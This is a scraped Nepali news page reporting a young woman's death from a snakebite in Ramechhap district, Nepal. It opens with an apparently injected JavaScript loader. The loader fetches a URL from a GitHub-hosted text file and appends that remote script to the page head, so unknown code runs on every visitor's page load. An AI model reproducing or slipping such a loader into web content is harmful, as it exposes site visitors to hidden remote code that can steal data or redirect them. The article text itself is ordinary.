;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापमा सर्पको टोकाइबाट एक महिलाको मृत्यु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • रामेछापमा सर्पको टोकाइबाट एक महिलाको मृत्यु
पत्रपत्रिका

रामेछापमा सर्पको टोकाइबाट एक महिलाको मृत्यु

सर्पको टोकाई

साउन १८

रामेछाप । रामेछाप जिल्लाको नगरपालिका वडा नं ४ हिमगंगा, कुसबसेरीकि एक महिलाको सर्पले डसेर ज्यान गएको छ । मृत्यु हुनेमा किरण मगरको श्रीमती अन्दाजी १९ वर्षीय रबिना मगर रहेकि छन् । उनलाई गएराति करिब ३ : ३० बजेको समयमा सुतिरहेको अवस्थामा एक्कासी सर्पले बायाँ हातको माझि औलामा गुर्वे नामक् सर्पले डसेको थियो ।

सर्पको टोकाइबाट घाइते मगरको उपचारको लागी स्थानीय मेडिकल साँघुटार लगिएकोमा त्याहाँ उपचार हुन नसकि थप उपचारको लागि सदरमुकाम मन्थलीस्थि तामकोशी अस्पताल ल्याउने क्रम्मा बाटैमा मृत्यु भएको जिल्ला प्रहरी कार्यालय रामेछापका प्रवक्ता टेकेन्द्र पौडेल शर्माले जानकारी दिए । file Photo

फेसबुक प्रतिक्रियाहरु